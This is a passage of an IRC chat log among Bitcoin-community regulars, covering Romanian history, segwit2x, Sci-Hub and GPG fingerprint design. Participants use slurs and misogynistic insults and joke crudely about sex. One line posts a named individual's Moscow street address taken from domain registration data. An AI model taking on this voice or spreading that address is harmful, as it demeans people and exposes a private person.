sucked into a power vacuum and trying to do best could be done. 1734178;1510157952;mircea_popescu;entirely ineptly led german war effort, very poorly supplied, resulted in an untenable military situation at the don's bend : romanian forces were out of ammunition, out of fuel, out of anything. the russians counterattacked the two sections held by romanians, and killed a quarter million people. 1734179;1510157990;asciilifeform;to run out of fuel, for army of ~the~ petrostan of europe, is quite a feat 1734180;1510157999;mircea_popescu;german management. 1734181;1510158015;mircea_popescu;the reason specifically they did that had nothing to do with hating the romanians or thinking they suck (which they didn't, on the contrary, germans even had german troops under romanian command) was that general sanatescu gave out the whole order of battle + everything else to the russians. 1734182;1510158068;mircea_popescu;as a result, the victorious revolutionaries found themselves in '45 in a dubious situation : they had absolutely no political legitimacy. outside of mihai, who was mentally incompetent then as now, but whose two aunts were very willing to sell out ; and sanatescu, who didn't think much of them (for cause), they had ~no one in bucharest. 1734183;1510158106;mircea_popescu;so they cut a deal with mihai (an amusing episode in itself, mihai was very much krammer in that negotiation episode, "we offer free lifetime cappucinos and,,," "ILL TAKE IT!!!1", and made a govt with sanatescu. 1734184;1510158164;mircea_popescu;from there on they forged an alliance with petru groza, a sorta-maybe left (less so than today's xtian democrats for instance) with some popular appeal, pretended to have won the election on ~43% of the vote, then leaned on individual ministers to play along, then scoured the prisons for credible ministalins. picked gheorghe gheorghiu dej and that was mostly it, they withdrew. 1734185;1510158177;mircea_popescu;this is ~the whole story of soviet colonization of romania. 1734186;1510158239;asciilifeform;sounds almost exactly same story as hungary 1734187;1510158244;mircea_popescu;just about. 1734188;1510158245;deedbot;http://trilema.com/2017/le-bal/ << Trilema - Le Bal 1734189;1510158272;asciilifeform;ty for the mini-article mircea_popescu . it makes sense. 1734190;1510158426;mircea_popescu;anyway. the russian secular view of romania is a sort of balanced chechenia-japan mix. 1734191;1510158438;asciilifeform;howsthat 1734192;1510158446;mircea_popescu;"fucking scary batshing insane barbarians of tiny size and austrian palaces. NIGGA WHAT?>!>!>!!!?" 1734193;1510158513;asciilifeform;dunno, at least from my perch common d00d's pov was 'europistan-lite', 'less retarded than us because at least slightly farther in magic compass direction' 1734194;1510158520;mircea_popescu;not altogether an un-understandable or for that matter incorrect view. moreover, owing to romania's incredible literary sterility as manifested as a long term sustained inability to meaningfully write themselves... 1734195;1510158538;mircea_popescu;asciilifeform im trying to condense together a period starting in 1850. 1734196;1510158608;mircea_popescu;including you know, the "pls halp" telegram, the turning of that war, the strange situation of ww1, the taking of odessa and march on rome, it's a complicated century. 1734197;1510158774;asciilifeform;'literary sterility' in this case i suspect comes from being very new to 'being country' -- not so much literature from finland, for instance, likewise 1734198;1510158793;asciilifeform;if your best literators learn french and move to paris -- problem. 1734199;1510158823;asciilifeform;( ionesco in particular comes to mind ) 1734200;1510158857;asciilifeform;rather like the literary-sterility of, e.g., nebraska in usa. 1734201;1510158870;asciilifeform;what kind of literate man wants to stay in nebraska. 1734202;1510158877;mircea_popescu;this is nonsense, romania was culturally powerful before the us was discovered, in numerous instantiations. 1734203;1510158897;asciilifeform;folx living in what is today romania. but did they do it 'under flag' of romania ? 1734204;1510158908;asciilifeform;iirc in mircea_popescu's piece just the other day was 'caragiale didn't need no stinking flag' 1734205;1510158916;mircea_popescu;it wouldn't make a difference. 1734206;1510158935;mircea_popescu;i don't care dimitrie cantemir's writings were "under flag of moldavia" or "Wallachia" or "greater kekistan" 1734207;1510158978;mircea_popescu;anyway, the problem isn't creators, that romania has. the problem is romania itself, as dumbly impermeable as fresh clay. 1734208;1510159000;asciilifeform;common feature of all agraristans neh 1734209;1510159024;mircea_popescu;there's two prongs that drive to "i understand empire france by reading balzac" : 1. that balzac writes and 2. that the whole fucking world buys his foilletons. 1734210;1510159028;mircea_popescu;romania's problem is 2 not 1. 1734211;1510159053;asciilifeform;the english managed to solve 2 without making any dent in 1 1734212;1510159053;mircea_popescu;asciilifeform very much so, yes, and especially of this worst agraristan of all, "we're still wearing same clothes as roman colonists 2000 years ago and really speak the same language and fuck you" 1734213;1510159060;asciilifeform;( and nao their rubbish is everywhere to this day ) 1734214;1510159064;mircea_popescu;asciilifeform quite exactly. 1734215;1510159082;mircea_popescu;but trilema is many things, and among them a very pointed exercise in this discussion. 1734216;1510159104;asciilifeform;i could think of worse things to be than 'time capsule' of old roman periphery tho. 1734217;1510159122;mircea_popescu;i deliberately took to employing a classical renaissance procedure, of re-writing. that i rewrote a bunch of classical works and the whole set of "Specialists" did not find themselves under a life-or-death obligation to drop everything they were doing and pick up this is one thing 1734218;1510159147;mircea_popescu;but i, and on multiple occasions, rewrote the work of LIVING AUTHORS. with their knowledge, that never amounted to more than a piddly comment on the trilema article in question. 1734219;1510159155;asciilifeform;but somehow when old shakespeare does it , 'mega-writer' 1734220;1510159163;mircea_popescu;think of this for a moment -- you, joe schmoe, write something. and someone comes and changes it. and you... HAVE NOTHING TO SAY. 1734221;1510159180;mircea_popescu;this is the problem of 2, and it is as deep as it gets. mentally isolated, solitary lonely lost dorks. 1734222;1510159215;mircea_popescu;can't meaningfully interact with a dog, let alone their wife, let alone you know, chtulhu from the depths of the abyss. 1734223;1510159230;asciilifeform;from asciilifeform's pov this is what culture ~is~ -- when ben_vulpes writes own vtron, or mircea_popescu makes own jazz riff on asciilifeform's 'chumps' article, or the various other. 1734224;1510159235;mircea_popescu;ikr. 1734225;1510159264;mircea_popescu;2 is 2. 1734226;1510159288;asciilifeform;the basic problem of agrarians -- insufficient fire under the heels 1734227;1510159295;mircea_popescu;on one of the trips, i had slut stop car on side of river while i took pics. fresh mud, inexperienced offroad driver, car got mudded. 1734228;1510159303;mircea_popescu;the wheel turned as well as ever ... but the car... it didn't move. 1734229;1510159306;mircea_popescu;mud, romania. 1734230;1510159341;mircea_popescu;very "conservative" and "tolerant" people, they call themselves. it's true, but the problem is the mud fits this definition. 1734231;1510159377;asciilifeform;lol 1734232;1510159554;asciilifeform;( meanwhile, in very vintage lulz -- https://www.msk.kp.ru/daily/26735/3763226/ >> 'Когда милиция устраивала облаву, в доме вырубали электричество. Импортные видаки без света не отдавали кассету с запретным видео. А у ВМ-12 был привод на пружинке, работал без энергии. Поэтому хо 1734233;1510159554;asciilifeform;зяин салона успевал вынуть кассету с эротикой и спрятать - за показ таких фильмов давали три года.' ) 1734234;1510159616;asciilifeform;( re why folx bought sov-made vcr, in preference to better-quality sony. answ : it had spring-powered cassette ejector, cops cut mains current when busting 'pr0n house' but could still get rid of the tape, in sov vcr ) 1734235;1510159680;mircea_popescu;ahaha 1734236;1510159685;mircea_popescu;wait, is pron house brothel ? 1734237;1510159701;asciilifeform;nah just folx partying with tapes 1734238;1510159705;mircea_popescu;... 1734239;1510159710;mircea_popescu;you mean, folks over the age of 14 ?! 1734240;1510159725;asciilifeform;penalty nominally 3y imprisonment 1734241;1510159759;mircea_popescu;this is some of the dumbest shit i ever heard. why not have women ? 1734242;1510159770;mircea_popescu;whole story reminds me of http://trilema.com/2012/deci-ca-sa-va-incepeti-noul-an-intr-un-mod-adecvat/ 1734243;1510159780;asciilifeform;ask the arabs ? or whatever monkeys just recently discovered pr0n 1734244;1510159819;mircea_popescu;i am (i guess?) proud to say that ro pron party included womenz to my knowledge. wtf is the point without, they jack off on the zacusci ? 1734245;1510159826;asciilifeform;( process seems to resemble chukchas discovering vodka ) 1734246;1510159905;asciilifeform;and i suspect that the story dwells on the cassette because being in a room full of chix, who may nor may not be whoring, was generally not an indictable crime 1734247;1510159911;asciilifeform;whereas 'magic tape' was . 1734248;1510159916;mircea_popescu;aaa 1734249;1510159932;mircea_popescu;thanks, i was having serious wtfx. 1734250;1510159971;asciilifeform;tho fwiw i have nfi whether they had chix in attendance , or sat like redditors in modern american dormitory, salivating . asciilifeform familiar with the period largely through myth & legend. 1734251;1510159975;mircea_popescu;anyway, wouldn't usually be room fulla chicks, unless in some narrow cases. generally the way this works is usualyl 2, rarely 1 if the men are poor or 3 if the men are showoffs, whores and however many men can stand each other, usually 8 +- 3 1734252;1510159977;*;trinque remembers a time from his youth when drunk, chick puts on porn in group mixed company, figures hey, we're gonna fuck, proceeds as such. 1734253;1510159983;trinque;much to the shock of all 1734254;1510159987;mircea_popescu;they drink, watch porn, gangbang. it's a "fishing trip" 1734255;1510159991;trinque;it was times like these I realized what a sad place I lived in 1734256;1510160007;asciilifeform;trinque: why sad ? sounds like happy memory neh 1734257;1510160009;mircea_popescu;trinque why ? didn;'t take ? 1734258;1510160021;trinque;nah bunch of liberal cunts "omg what? no!" 1734259;1510160029;mircea_popescu;so kick them out. 1734260;1510160037;trinque;wasn't my place; kicked myself out with one of their bottles 1734261;1510160045;mircea_popescu;also works. 1734262;1510160320;trinque;ben_vulpes has commented on this cognitive dissonance among the feminist cunts in portland. will go to the stripclub to signal lack of patriarchy something something, but find prostitution abhorrent 1734263;1510160335;mircea_popescu;um 1734264;1510160345;mircea_popescu;tell them it doesn't count untill they kiss the dancer's slit. 1734265;1510160372;trinque;lol 1734266;1510160412;mircea_popescu;one of the better lulz re this happened at c3, in ba. bucnha us at a large table at this dinner-and-tango places, someone brought along some blondy german chick, i dun recal who 1734267;1510160426;mircea_popescu;and she wanted a drink and the waiter came over to ask me and i said sure and she was all "why is he asking you ?" 1734268;1510160431;mircea_popescu;"why do you think ?" 1734269;1510160443;mircea_popescu;i'm guessing that scored one for teh patriarchy. 1734270;1510160509;trinque;http://btcbase.org/log/2017-05-14#1655878 << inexcuably rude, not knowing how that works 1734271;1510160509;a111;Logged on 2017-05-14 16:50 trinque: then two women at table wail "oh he didn't shake our hands" 1734272;1510160564;asciilifeform;lol iirc ben_vulpes's chix 1734273;1510160571;mircea_popescu;i can't recall now if this was the same chich some elements in the { ben_vulpes , davout } set might've fucked at some later point. 1734274;1510160593;mircea_popescu;since trinque had me re,read http://btcbase.org/log/2017-05-14#1655881 << i am happy to report dood actually gave us a lift later on. his car was fulla various condiments. 1734275;1510160593;a111;Logged on 2017-05-14 16:51 mircea_popescu: the (very indian) chef of great local place actually came out of kitchen to see these two people who were eating all the stuff i rodered ; but couldn't summon the courage to more than bow from a distance and scurry off. 1734276;1510160602;mircea_popescu;apparently he goes through the caudine forks to supply his kitchen with proper stuffs. 1734277;1510160943;davout;http://btcbase.org/log/2017-11-08#1734153 <<< it does beat "your house lock on the ethereum chain" 1734278;1510160943;a111;Logged on 2017-11-08 16:05 asciilifeform: in other lulz, amazon co nao offering... i shit thee not, 'Not at home? Not a problem. As a Prime member, you can get packages securely delivered into your home without being there. Plus, grant access to the people you trust, like your family, friends, dog walker, or house cleaner—no more leaving a key under the mat.' << 'cloud'-controlled door lock. 1734279;1510160959;asciilifeform;davout: the distinction is lost on me 1734280;1510161005;davout;you're not missing much tbh 1734281;1510161220;asciilifeform;oh btw re http://btcbase.org/log/2017-11-08#1733937 thread >> apparently it was a straight clone of hruschev-era 'Север' . 1734282;1510161220;a111;Logged on 2017-11-08 01:43 asciilifeform: mircea_popescu: re 'fram, ursul polar' -- the ancient ЗИЛ-like fridge in 'museum of communist konsoomer' is a 'fram' 1734283;1510161583;asciilifeform;meanwhile, in the world of 31333337 w4r3z and trials in absentia, https://archive.is/SCF7O >> 'The American Chemical Society (ACS) has won a lawsuit against the pirate research-paper website Sci-Hub ... ordered Sci-Hub's operators to pay the ACS US$4.8 million ... The judge also ordered that any party “in active concert or participation” with Sci-Hub should “cease facilitating” access to the repository. This means that the AC 1734284;1510161583;asciilifeform;S could request Internet services including web providers, search engines and domain-name registrars to stop linking or to block access to Sci-Hub and the various domains it is hosted under.' 1734285;1510161608;asciilifeform;'Such an order by a US court is exceptional, Carroll says. “In general, our federal courts do not have the power to issue orders against people or entities that were not part of the lawsuit.” But he adds that US federal rules for civil procedures such as this do sometimes allow injunctions against persons who are in ‘active participation’ with an enjoined party. The current lawsuit is an example of that, he says.' 1734286;1510161612;asciilifeform;gold. 1734287;1510161671;asciilifeform;plus 'Commenting is currently unavailable.' 1734288;1510162247;davout;so apparently the segwit2x derps finally yielded https://lists.linuxfoundation.org/pipermail/bitcoin-segwit2x/2017-November/000685.html 1734289;1510162295;asciilifeform;lol!! 1734290;1510162328;asciilifeform;just when delish phreee giveaway of btc was so close!11 1734291;1510162345;*;asciilifeform muchly enjoyed the last idjitphork 1734292;1510162394;ben_vulpes;mthreat's chica i believa 1734293;1510162424;mod6;davout: thx for posting 1734294;1510162427;asciilifeform;!~seen mthreat 1734295;1510162427;jhvh1;asciilifeform: I have not seen mthreat. 1734296;1510162431;mod6;ben_vulpes: aha, yeah, i think that's correct 1734297;1510162448;asciilifeform;!#seen mthreat 1734298;1510162448;a111;2017-04-01 ya the -800 is pretty new right 1734299;1510162450;ben_vulpes;but very friendly 1734300;1510162458;ben_vulpes;"the most natural thing" 1734301;1510162574;trinque;!!ticker market --all 1734302;1510162590;trinque;not even close eh 1734303;1510162601;trinque;!~ticker --market all 1734304;1510162607;jhvh1;trinque: Bitstamp BTCUSD last: 7650.89, vol: 15621.46032284 | Bitfinex BTCUSD last: 7730.0, vol: 56197.5670289 | Kraken BTCUSD last: 7655.1, vol: 4215.77288223 | Volume-weighted last average: 7709.59388188 1734305;1510162613;ben_vulpes;shit damn 1734306;1510162820;mod6;aha 1734307;1510162891;trinque;https://coinmarketcap.com/currencies/segwit2x/ << bwahaha 1734308;1510162910;asciilifeform;lol! still >0 ! 1734309;1510162927;asciilifeform;what's the logic, gotta wonder, 'maybe they'll reconsider surrendering' ? 1734310;1510162996;asciilifeform;!~ticker --market all 1734311;1510163002;jhvh1;asciilifeform: Bitstamp BTCUSD last: 7753.42, vol: 16000.49915005 | Bitfinex BTCUSD last: 7788.8, vol: 57699.4896064 | Kraken BTCUSD last: 7729.5, vol: 4246.09943359 | Volume-weighted last average: 7778.30696083 1734312;1510163015;asciilifeform;notbad.jpg 1734313;1510163175;asciilifeform;lol orig link ddos-dead 1734314;1510163240;trinque;now at $360.13 (-73.15%) 1734315;1510163245;shinohai;http://archive.is/BUktC 1734316;1510163297;asciilifeform;the brick has lost its wings. 1734317;1510163349;mod6;thx shinohai 1734318;1510163368;shinohai;^.^ 1734319;1510163508;asciilifeform;!#seen mike_c 1734320;1510163508;a111;2017-09-11 congrats! I did that a long time ago too. Good luck with it. 1734321;1510163514;asciilifeform;!#seen Framedragger 1734322;1510163514;a111;2017-10-06 yes but someone committing to the project without having the necessary time is not far away from malice, imho 1734323;1510163922;asciilifeform;248... 1734324;1510163945;trinque;graph of folks that didn't get the news over time 1734325;1510163950;asciilifeform;to the antimoon!! 1734326;1510164340;davout;http://btcbase.org/log/2017-11-08#1734309 <<< logic is that on some platform that offered "prefork coin splitting" the prefork-SW2X-coinz are needed to merge with the prefork-actual-bitcoin in order to have a prefork-full-bitcoin 1734327;1510164340;a111;Logged on 2017-11-08 17:42 asciilifeform: what's the logic, gotta wonder, 'maybe they'll reconsider surrendering' ? 1734328;1510164371;davout;people buying them do so in order to be able to withdraw from platforms immediately without waiting for the contract expiration on nov. 16th 1734329;1510164379;davout;therefore, nonzero value 1734330;1510164390;asciilifeform;lol 280, somebody... ~buying~ 1734331;1510164401;asciilifeform;prolly for the reason davout explained. rerun of goxcoin. 1734332;1510164420;asciilifeform;( whatever happened to goxcoin ? ) 1734333;1510164439;trinque;sold mine to that btcbuilder bag holder for a huge haircut 1734334;1510164458;davout;will converge to perceived risk pricing of leaving buttcoin on a platform until contract expiration 1734335;1510164474;davout;goxcoin procedures still ongoing i hear 1734336;1510165141;shinohai;https://radkink.com/ <<< Some retarded feminists are giving away sex toys "because men orgasm more than women" or something 1734337;1510165160;shinohai;Is this good for buttplugcoin? 1734338;1510171435;mircea_popescu;http://btcbase.org/log/2017-11-08#1734285 << and, evidently, anyone gives a shit what the usg does. because hurr. 1734339;1510171435;a111;Logged on 2017-11-08 17:20 asciilifeform: 'Such an order by a US court is exceptional, Carroll says. “In general, our federal courts do not have the power to issue orders against people or entities that were not part of the lawsuit.” But he adds that US federal rules for civil procedures such as this do sometimes allow injunctions against persons who are in ‘active participation’ with an enjoined party. The current lawsuit is an example of that, he says.' 1734340;1510171453;mircea_popescu;http://btcbase.org/log/2017-11-08#1734288 << less thick than the previous set, i guess. 1734341;1510171453;a111;Logged on 2017-11-08 17:30 davout: so apparently the segwit2x derps finally yielded https://lists.linuxfoundation.org/pipermail/bitcoin-segwit2x/2017-November/000685.html 1734342;1510171489;mircea_popescu;http://btcbase.org/log/2017-11-08#1734292 << nah, brunette girl. 1734343;1510171489;a111;Logged on 2017-11-08 17:33 ben_vulpes: mthreat's chica i believa 1734344;1510171546;mircea_popescu;http://btcbase.org/log/2017-11-08#1734309 << the logic of numbers someone printed on a website is "when did they last summon the energy to edit the file" 1734345;1510171546;a111;Logged on 2017-11-08 17:42 asciilifeform: what's the logic, gotta wonder, 'maybe they'll reconsider surrendering' ? 1734346;1510171564;ben_vulpes;mircea_popescu: the german? 1734347;1510171573;mircea_popescu;no, mthreat's girl. 1734348;1510171594;ben_vulpes;the german, who is under discussion, came with mthreat 1734349;1510171601;ben_vulpes;not necessarily 'his girl' 1734350;1510171607;mircea_popescu;ah ? 1734351;1510171614;mircea_popescu;you know what, i think you're right actually. 1734352;1510171621;ben_vulpes;will wonders never cease 1734353;1510171715;mircea_popescu;lmao 1734354;1510171735;mircea_popescu;http://btcbase.org/log/2017-11-08#1734336 << this is a fundamental property of sexuate species. 1734355;1510171735;a111;Logged on 2017-11-08 18:19 shinohai: https://radkink.com/ <<< Some retarded feminists are giving away sex toys "because men orgasm more than women" or something 1734356;1510171768;shinohai;But hey free buttplugs! 1734357;1510171828;mircea_popescu;this is like "free hubcaps!!!". if i can buy a car i don't need anyone's hubcaps wtf. 1734358;1510171835;mircea_popescu;and in other similar lulz, http://trilema.com/2016/introducing-permanence/#comment-123499 1734359;1510171931;shinohai;lol 1734360;1510172155;asciilifeform;!~ticker --market all 1734361;1510172161;jhvh1;asciilifeform: Bitstamp BTCUSD last: 7241.03, vol: 22876.12064007 | Bitfinex BTCUSD last: 7164.3, vol: 88327.80680416 | Kraken BTCUSD last: 7204.6, vol: 5417.66588459 | Volume-weighted last average: 7181.22325251 1734362;1510172175;asciilifeform;!~calc 7241 * 11000 1734363;1510172176;jhvh1;asciilifeform: 7241 * 11000 = 79651000 1734364;1510172183;asciilifeform;notbad.spam 1734365;1510172184;mircea_popescu;hey, modest man. 1734366;1510172193;asciilifeform;tho i suspect somebody hasn't updated his spamatron since 2010 or so 1734367;1510172347;mircea_popescu;asciilifeform registered on the 7th current ie yest 1734368;1510172374;mircea_popescu;firstvds.ru 1734369;1510172387;asciilifeform;then gotta wonder, wai only promise 80 megabuxorz worth of coin, why not 9000. 1734370;1510172436;mircea_popescu;Roman Pashkevich ul.Koshkina, d.15, kv.4 Moskva. 1734371;1510172437;asciilifeform;and how one even goes about picking such a figure. 1734372;1510172449;mircea_popescu;amusing fellow, also has "1-milion-rubley" and so on 1734373;1510172492;asciilifeform;lol that's less than a toyota 1734374;1510172500;mircea_popescu;(also published physicist of same name -- i suspect the father) 1734375;1510172506;asciilifeform;sad. 1734376;1510172518;mircea_popescu;tis the name that caught the eye 1734377;1510172632;mircea_popescu;https://archive.is/dMDOP <<>> https://archive.is/aWkOK << a study in usg-independent "technology". 1734378;1510172640;mircea_popescu;exactly like the silicon valley variant in all points. 1734379;1510172779;shinohai;Rather like http://btce.pro/ 1734380;1510172881;mircea_popescu;shinohai nah, that's more sophisticated. 1734381;1510172953;*;shinohai likes how they bother with cloudflare, yet leak true ip due to mis-configured mail server 1734382;1510172961;mircea_popescu;asciilifeform i find amusing the, eg, "suv" toyota recently waxed and parked in mud in front of a cheap brick wall. evidently, "vehemently opulent pork sausages". 1734383;1510173796;mircea_popescu;shinohai sadly, nobody does any schooling with the independent minded young'uns. 1734384;1510173814;mircea_popescu;and in other lulz, eulora player complains about game generated name. "it sounds like a pornstar!" 1734385;1510173822;mircea_popescu;the name in question being, baldwin lushdrizzle. 1734386;1510173967;shinohai;Googling `lushdrizzle` returns mostly lemon caek results, no pornstars. 1734387;1510173977;shinohai;I am disappoint. 1734388;1510173992;mircea_popescu;i would propose this is because pornstars lack imagination not because the name lacks suggestiveness. 1734389;1510174084;shinohai;I got pretty lucky with my generated Eulora name, was happy with it. 1734390;1510174158;davout;http://btcbase.org/log/2017-11-08#1734385 <<< such ai 1734391;1510174158;a111;Logged on 2017-11-08 20:43 mircea_popescu: the name in question being, baldwin lushdrizzle. 1734392;1510174167;mircea_popescu;ikr 1734393;1510175137;lobbes;note to n00bs out there: even if you had set your key to NOT expire, remember to *self-sign* both your pub AND your sub (and make sure people have copies of this updated pubkey)) 1734394;1510175173;lobbes;thanks to trinque to his patience with me while I figured all that out the hard way 1734395;1510175217;mircea_popescu;what happened, your sub expired ? detailz. 1734396;1510175283;lobbes;all good now, but I had set my primary pub to not expire I think a year ago. But of course, I neglected to push this updated key to either keyservers or to, for example, deedbot 1734397;1510175295;mircea_popescu;ah 1734398;1510175298;lobbes;rookie mistake 1734399;1510175638;lobbes;and yeah, I overlooked that I apparently had to also remove expiration on the sub -explicitly- (via gpg --edit-key). Even though it was showing the sub as 'expiration: none' after I had removed expiration on the pub way back when 1734400;1510175811;mircea_popescu;myeah, kinda unreliable apparatus. 1734401;1510175812;asciilifeform;mircea_popescu: 'Я их специально скрыл под замком, для того чтобы отсеять зевак и прохожих.' << lel 1734402;1510175866;asciilifeform;afaik we dun use 'key servers' for anything no moar 1734403;1510175926;asciilifeform;https://archive.is/4YKg5 << in other fritzchip lulz 1734404;1510175945;mircea_popescu;notrly, no. koch-gpg iotself though. 1734405;1510175954;asciilifeform;only if you pull by fp 1734406;1510175959;asciilifeform;which why wouldyou. 1734407;1510175967;mircea_popescu;huh ? 1734408;1510175969;asciilifeform;fpism is braindamaged. 1734409;1510176059;davout;what's wrong with long fps again? 1734410;1510176067;asciilifeform;fwiw i never pushed my final gpg key to sks, and have nfi if it's there or not 1734411;1510176070;asciilifeform;davout: it's a sha1 1734412;1510176076;asciilifeform;and cannot be changed per the rfc. 1734413;1510176081;davout;ah right 1734414;1510176110;davout;pull by full key then!11 genius! 1734415;1510176130;asciilifeform;pull by getting key... from people 1734416;1510176168;trinque;deedbot doesn't use keyservers no, so it didn't know he updated his key 1734417;1510176196;davout;asciilifeform: yeah, or use sane hash 1734418;1510176197;asciilifeform;this is The Right Thing 1734419;1510176207;asciilifeform;davout: YOU CANNOT USE SANE HASH WITH GPG FP 1734420;1510176214;asciilifeform;rfc specified sha1. 1734421;1510176217;mircea_popescu;at no point was this discussion about key identifiers. the fact that gpg reports "no expiration" FALSELY, as it reports all sorts of false or otherwise stupid, misleading etc non-facts is at issue 1734422;1510176230;mircea_popescu;koch-gpg is an unreliable apparatus in the vein of random-shooting pistols etc. 1734423;1510176234;trinque;100% 1734424;1510176254;asciilifeform;it's approx on par with the old chinese leather cannon, even chance of exploding 1734425;1510176269;davout;asciilifeform: i'm not speaking about gpg as its currently-existing braindamaged implementation of a shaky protocol 1734426;1510176284;asciilifeform;davout: speaking in general of all even vaguely pgp-like compatibles 1734427;1510176290;asciilifeform;all stuck with sha1 4evah 1734428;1510176303;asciilifeform;there's no provision for changing the fp algo. 1734429;1510176305;davout;point is, if done properly fingerprints, when done properly, are a +ev proposition 1734430;1510176310;asciilifeform;i disagree 1734431;1510176315;asciilifeform;lemme dig out the thread 1734432;1510176329;davout;few days ago amirite 1734433;1510176346;asciilifeform;year+ 1734434;1510176365;davout;ok, not same one then, plox to link 1734435;1510176411;asciilifeform;http://btcbase.org/log/2017-08-15#1698400 << most recent one 1734436;1510176411;a111;Logged on 2017-08-15 22:24 asciilifeform: likewise we had the fingerprint thread 1734437;1510176422;asciilifeform;( has links to earliers ) 1734438;1510176435;davout;ok lol, will read 1734439;1510176437;davout;ty 1734440;1510176442;asciilifeform;http://btcbase.org/log/2016-12-27#1590895 + http://btcbase.org/log/2017-04-09#1640824 for completeness. 1734441;1510176442;a111;Logged on 2016-12-27 05:27 asciilifeform: the only sane 'fingerprint' is the entire modulus+exponent. 1734442;1510176442;a111;Logged on 2017-04-09 14:45 mircea_popescu: asciilifeform incidentally, the more i think about it the more i'm convinced the ONLY "fingerprint" for rsa key may be... the modulus. 4096 bits and fuck you, if you can't take 32 chars you don't belong here. 1734443;1510176803;mircea_popescu;512 chars as the case may be, but anyway. 1734444;1510176835;asciilifeform;moar if people get to pick own exponent 1734445;1510176878;davout;512 bytes, will be 1024 chars 1734446;1510176900;davout;+ exponent as asciilifeform points out, which iirc is to be 'large' as well 1734447;1510176911;asciilifeform;1024 byte all. 1734448;1510176923;davout;so 2048 hex chars 1734449;1510176953;davout;i do get the points about hashes being voodoo black boxes, but otoh 2048 hex chars is hardly practical 1734450;1510176976;asciilifeform;entirely practical. 1734451;1510176990;asciilifeform;get used to doing ~the actual thing~ instead of 'convenient' simulacra. 1734452;1510177005;asciilifeform;this echoes the ffa 'omfg slow' discussions. 1734453;1510177020;davout;furthermore, i disagree with http://btcbase.org/log/2016-12-27#1590896 in that the hash function doesn't have to be a "single" hash function, let user specify, or even put multiple fingerprints 1734454;1510177020;a111;Logged on 2016-12-27 05:28 asciilifeform: anything else puts a megatonne of weight on one single hash, a titanic reward for finding one single solitary collision, hashes (which are voodoo, in all variants, see friday's thread) are not built to withstand this kind of pressure. 1734455;1510177021;asciilifeform;yes indeed the Actual Thing costs moar than the plastic doll. 1734456;1510177039;asciilifeform;davout: it has to be a fixed in advance hash function. 1734457;1510177048;asciilifeform;and it doesn't matter what you make it out of. 1734458;1510177080;asciilifeform;hashes are voodoo, there is not a hash of demonstrable strength for the same reason there is not block cipher of same ( they are different sides of same medal, we had thread with elementary proof ) 1734459;1510177096;davout;"my cunthash256 is abcd", what's wrong with that 1734460;1510177097;trinque;what's this practicality argument? the paste is longer? 1734461;1510177136;asciilifeform;davout: http://btcbase.org/log/2016-12-27#1590896 1734462;1510177136;a111;Logged on 2016-12-27 05:28 asciilifeform: anything else puts a megatonne of weight on one single hash, a titanic reward for finding one single solitary collision, hashes (which are voodoo, in all variants, see friday's thread) are not built to withstand this kind of pressure. 1734463;1510177143;davout;spotting small differences in a 2048 blurb subjectively sounds impractical to me 1734464;1510177152;asciilifeform;diff exists. 1734465;1510177155;asciilifeform;what spotting. 1734466;1510177176;asciilifeform;and you're welcome to hash on own end, 'in harem'. just don't refer to my key as its hash, it is unseemly 1734467;1510177191;asciilifeform;how you keep straight the contents of own household, is none of my business 1734468;1510177199;asciilifeform;but outside , my key is my key. not a hash. 1734469;1510177279;davout;how do you picture a key exchange, from a practical pov? 1734470;1510177281;asciilifeform;observe the mendacious idiocy of koch's signature code, where if sha1 hash collision is found , can forge sigs ~regardless of what sig algo hashing was set to~ 1734471;1510177321;asciilifeform;davout: 1) in person 2) via secure channel from people who you already know, who know $person. 1734472;1510177460;lobbes;asciilifeform> afaik we dun use 'key servers' for anything no moar << at least for this exercise, I was using it for quick verification of what my exported pub looked liek imported on something that was not on my local machine. 1734473;1510177463;lobbes;But otherwise, even I can agree: no real use for key servers as-a-thing. And, as I've found out, expiration-as-a-thing idem 1734474;1510177479;ben_vulpes;and then send a few messages to your counterparty and get confirmation that they decrypt, and ask for the same 1734475;1510177492;trinque;I yet await the tale of the man who used the expiration field to his benefit. 1734476;1510177496;ben_vulpes;via mail, email, irc, paste 1734477;1510177517;ben_vulpes;shortwave! 1734478;1510177538;ben_vulpes;even the mail! gotta keep the lizards on their toes. 1734479;1510177576;ben_vulpes;and if it's not important enough to push a valid key through the cracks of the sybil wall, i guess it wasn't actually important enough. 1734480;1510177586;mircea_popescu;asciilifeform there's no need to include the exponent. if ppl don't know what exponent to use for a certain modulus, let them find out. 1734481;1510177593;ben_vulpes;(or, "be less poor") 1734482;1510177617;mircea_popescu;asciilifeform unless the fucking fp can fit in irc, we're stuck building gossipd before using this "Actual thing" 1734483;1510177655;mircea_popescu;trinque the argument is that check this out : 1734484;1510177657;mircea_popescu;!!key trinque 1734485;1510177658;deedbot;http://wot.deedbot.org/FC66C0C5D98C42A1D4A98B6B42F9985AFAB953C4.asc 1734486;1510177666;mircea_popescu;what happens if FC66C0C5D98C42A1D4A98B6B42F9985AFAB953C4 is longer than a chat line ? 1734487;1510177687;mircea_popescu;yes, obviously we would use deflation, say baseblabla to fix this up to a point. 1734488;1510177726;mircea_popescu;but if you come up with the idea that "you know what, alf can have whatever kilometric hash and in my deedbot implementation ima use the first 100 chars and that's that" im not gonna bitch. 1734489;1510177773;mircea_popescu;which reduces to "there ARE practical limits to labels for things ; and they are unrelated to the sizes of the things, i expect the WORD for ant, dick, car and aeroplane to all fit the ~5.6 characters rule as universally enforced in alphabet" 1734490;1510177813;trinque;right, I could as well use nick for that, since it's a non-colliding namespace for those 1734491;1510177848;mircea_popescu;sure. but more generally, the names of things respect the rules of grammar, not the rules of mechanics. 1734492;1510177936;mircea_popescu;on which topic, i suppose also related http://trilema.com/2015/and-then-she-went-splat-on-the-asphalt/#selection-413.0-413.67 1734493;1510178391;trinque;bahaha 1734494;1510178393;asciilifeform;http://btcbase.org/log/2017-11-08#1734480 << how are they to find out ? by same argument you could as easily say 'post first half of modulus, let'em look for other half' 1734495;1510178393;a111;Logged on 2017-11-08 21:46 mircea_popescu: asciilifeform there's no need to include the exponent. if ppl don't know what exponent to use for a certain modulus, let them find out. 1734496;1510178405;asciilifeform;pub exponent isn't a function of modulus, it's an independent variable 1734497;1510178428;asciilifeform;change pubexp ? you get a different pubkey 1734498;1510178458;mircea_popescu;you are confusing the label with the contents. 1734499;1510178464;mircea_popescu;modulus completely identifies a key. 1734500;1510178479;asciilifeform;nope 1734501;1510178480;mircea_popescu;this complete identification may not include automatically the irc name, or the exponent, or the user's dog's picture 1734502;1510178487;asciilifeform;review the algo. 1734503;1510178488;mircea_popescu;nevertheless, there's 